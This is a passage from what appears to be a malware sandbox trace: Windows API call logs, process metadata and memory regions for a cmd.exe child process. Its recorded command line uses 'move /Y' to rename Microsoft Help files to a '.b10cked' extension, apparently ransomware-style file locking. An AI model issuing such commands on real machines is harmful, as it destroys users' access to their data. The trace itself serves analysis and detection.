(normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.498] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.498] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.498] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.498] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.498] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.498] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.499] GetEnvironmentStringsW () returned 0x3822d0* [0197.499] FreeEnvironmentStringsW (penv=0x3822d0) returned 1 [0197.499] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.499] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.499] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.499] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.499] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.499] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0197.499] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.499] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9f8, lpFilePart=0x1ef9f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9f4*="Desktop") returned 0x18 [0197.499] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.499] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef774 | out: lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef774 | out: lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef774 | out: lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.500] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.500] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.500] GetEnvironmentStringsW () returned 0x382af0* [0197.501] FreeEnvironmentStringsW (penv=0x382af0) returned 1 [0197.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.501] GetConsoleOutputCP () returned 0x1b5 [0197.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.501] GetUserDefaultLCID () returned 0x409 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb38, cchData=128 | out: lpLCData="0") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb38, cchData=128 | out: lpLCData="0") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb38, cchData=128 | out: lpLCData="1") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.502] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.504] GetConsoleTitleW (in: lpConsoleTitle=0x3708e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.617] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.617] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.617] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.617] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.617] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.617] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.617] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.620] GetConsoleTitleW (in: lpConsoleTitle=0x1ef830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.620] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.620] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="REN") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.620] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="MD") returned 11 [0197.620] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.620] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.620] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.621] _wcsicmp (_String1="move", _String2="START") returned -6 [0197.621] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.621] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.621] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.622] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.622] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.622] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef5ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef5e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef5e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.623] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.623] _wcsicmp (_String1="MSGRAP~1.HXN", _String2=".") returned 63 [0197.623] _wcsicmp (_String1="MSGRAP~1.HXN", _String2="..") returned 63 [0197.623] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgrap~1.hxn")) returned 0x2022 [0197.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", nBufferLength=0x104, lpBuffer=0x1eef74, lpFilePart=0x1eef5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", lpFilePart=0x1eef5c*="MSGRAP~1.HXN") returned 0x27 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.624] _wcsicmp (_String1="MSGRAP~1.HXN", _String2=".") returned 63 [0197.624] _wcsicmp (_String1="MSGRAP~1.HXN", _String2="..") returned 63 [0197.624] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgrap~1.hxn")) returned 0x2022 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef188 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", lpFilePart=0x1ef188*="MSGRAP~1.HXN") returned 0x27 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef5f8, lpFilePart=0x1ef188 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked", lpFilePart=0x1ef188*="MS.GRAPH.14.1033.hxn.b10cked") returned 0x37 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] SetLastError (dwErrCode=0x0) [0197.625] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.graph.14.1033.hxn.b10cked")) returned 0xffffffff [0197.625] GetLastError () returned 0x2 [0197.625] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1eeb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb04) returned 0x370e68 [0197.625] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x1eeb04 | out: lpFindFileData=0x1eeb04) returned 0 [0197.625] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.625] GetLastError () returned 0x12 [0197.625] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1eeb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb04) returned 0x370e68 [0197.626] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x1eeb04 | out: lpFindFileData=0x1eeb04) returned 0 [0197.626] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.626] GetLastError () returned 0x12 [0197.626] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x381bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd8) returned 0x370e68 [0197.626] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x381bd8 | out: lpFindFileData=0x381bd8) returned 0 [0197.626] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.627] GetLastError () returned 0x12 [0197.627] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x381bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd8) returned 0x370e68 [0197.627] FindNextFileW (in: hFindFile=0x370e68, lpFindFileData=0x381bd8 | out: lpFindFileData=0x381bd8) returned 0 [0197.627] FindClose (in: hFindFile=0x370e68 | out: hFindFile=0x370e68) returned 1 [0197.627] GetLastError () returned 0x12 [0197.627] _get_osfhandle (_FileHandle=2) returned 0xb [0197.627] GetFileType (hFile=0xb) returned 0x2 [0197.627] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.627] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eecd4 | out: lpMode=0x1eecd4) returned 1 [0197.627] _get_osfhandle (_FileHandle=2) returned 0xb [0197.627] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eed08 | out: lpConsoleScreenBufferInfo=0x1eed08) returned 1 [0197.627] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.628] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eed48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.628] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eed2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eed2c*=0x2c) returned 1 [0197.629] longjmp () [0197.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.629] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.629] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.629] SetConsoleInputExeNameW () returned 0x1 [0197.629] GetConsoleOutputCP () returned 0x1b5 [0197.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.629] exit (_Code=1) Process: id = "459" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29091 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29092 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29093 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29094 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29095 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29096 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29097 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29098 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29099 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29100 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29121 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29122 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29123 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29124 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 29125 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 29126 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29127 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29128 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29129 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29130 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29131 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29132 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29133 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29134 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29135 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 29136 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29137 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29138 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29139 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29140 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29141 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29142 start_va = 0x5c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 29143 start_va = 0x6d0000 end_va = 0x12cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 29144 start_va = 0x12d0000 end_va = 0x1432fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 29195 start_va = 0x130000 end_va = 0x1effff entry_point = 0x130000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 654 os_tid = 0xcbc [0197.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe84 | out: 